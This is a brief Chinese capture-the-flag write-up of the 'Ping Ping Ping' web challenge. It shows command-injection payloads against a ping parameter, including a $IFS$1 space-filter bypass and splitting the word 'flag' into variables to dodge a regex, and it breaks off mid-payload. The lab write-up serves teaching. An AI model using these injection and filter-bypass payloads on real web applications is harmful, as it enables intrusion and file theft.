[BUUCTF]web 刷题记录

[GXYCTF2019]Ping Ping Ping使用;来拼接多条命令输入：?ip=127.0.0.1;ls发现有flag.php?ip=127.0.0.1;cat index.php应该是过滤了空格，可以用$IFS$1绕过读取到index.php，F12看过滤了什么，过滤的很干净注意这里：preg_match("/.*f.*l.*a.*g.*/", $ip)这个的意思是匹配到按flag这个顺序的所有字符所以我们不按顺序就好了：payload：/?ip=127.0.0.1;a=ag